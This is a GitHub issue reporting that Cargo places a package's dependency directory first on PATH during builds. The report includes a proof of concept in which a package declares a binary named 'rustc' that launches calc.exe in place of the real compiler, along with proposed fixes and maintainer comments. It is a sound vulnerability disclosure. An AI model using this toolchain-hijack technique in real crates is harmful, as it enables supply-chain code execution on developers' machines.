Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary code execution during cargo build #13897

Open
LOURC0D3 opened this issue May 10, 2024 · 2 comments
Open

Arbitrary code execution during cargo build #13897

LOURC0D3 opened this issue May 10, 2024 · 2 comments
Labels
A-security Area: security C-bug Category: bug S-triage Status: This issue is waiting on initial triage.

Comments

@LOURC0D3
Copy link

LOURC0D3 commented May 10, 2024

Problem

When cargo builds a package, it adds the dependency directory to the front of the PATH environment variable.
As a result, the malicious package's modified executable is resolved and executed before toolchain executables such as rustc or cc.
This means that a malicious package may lead to arbitrary code execution.

This appears to be a similar issue to CVE-2024-24787(https://pkg.go.dev/vuln/GO-2024-2825), which was recently discovered in Golang.
However, this bug affects all operating systems, not just Darwin.

Additionally, while CVE-2024-24787 modifies path resolution by directly changing linker flags, Cargo does not require that.

Steps

  1. Configure malicious package.
  • rustc.rs
use std::process::Command;

fn main()
{
	let _test = Command::new("C:\\\\Windows\\\\System32\\\\calc.exe")
		.spawn();
}
  • main.rs
mod rustc;
fn main() {
    println!("Hello, world!");
}
  • Cargo.toml
[package]
name = "poc"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at <https://doc.rust-lang.org/cargo/reference/manifest.html>

[dependencies]
cc = "1.0.94" # for waiting to malicious program

[[bin]]
name = "rustc"
path = "src/rustc.rs"

[[bin]]
name = "test"
path = "src/test.rs"
  1. Result

Running cargo build executes arbitrary code.

스크린샷 2024-05-10 오전 11 35 34
poc.mp4

Possible Solution(s)

  • Place the build/deps directory at the end of PATH.
    • The Security team says that break legitimate functionality that expects local libraries to be considered before system libraries. However, it is questionable whether there are cases where local libraries should be considered first.
  • Register a blacklist to prevent building with the executable name of the toolchain used by Rust.

Notes

I reported this bug to the Rust Security Response WG, but it was not treated as a security vulnerability.

Version

release: 1.77.2
commit-hash: e52e360061cacbbeac79f7f1215a7a90b6f08442
commit-date: 2024-03-26
host: x86_64-pc-windows-msvc
libgit2: 1.7.2 (sys:0.18.2 vendored)
libcurl: 8.5.0-DEV (sys:0.4.70+curl-8.5.0 vendored ssl:Schannel)
os: Windows 10.0.22631 (Windows 11 Professional) [64-bit]
@LOURC0D3 LOURC0D3 added C-bug Category: bug S-triage Status: This issue is waiting on initial triage. labels May 10, 2024
@valadaptive
Copy link
Contributor

It probably was not treated as a vulnerability because Cargo intentionally gives you a way to run arbitrary Rust code at build time via build scripts.

@heisen-li
Copy link
Contributor

@rustbot label +A-security

@rustbot rustbot added the A-security Area: security label May 10, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
A-security Area: security C-bug Category: bug S-triage Status: This issue is waiting on initial triage.
Projects
None yet
Development

No branches or pull requests

4 participants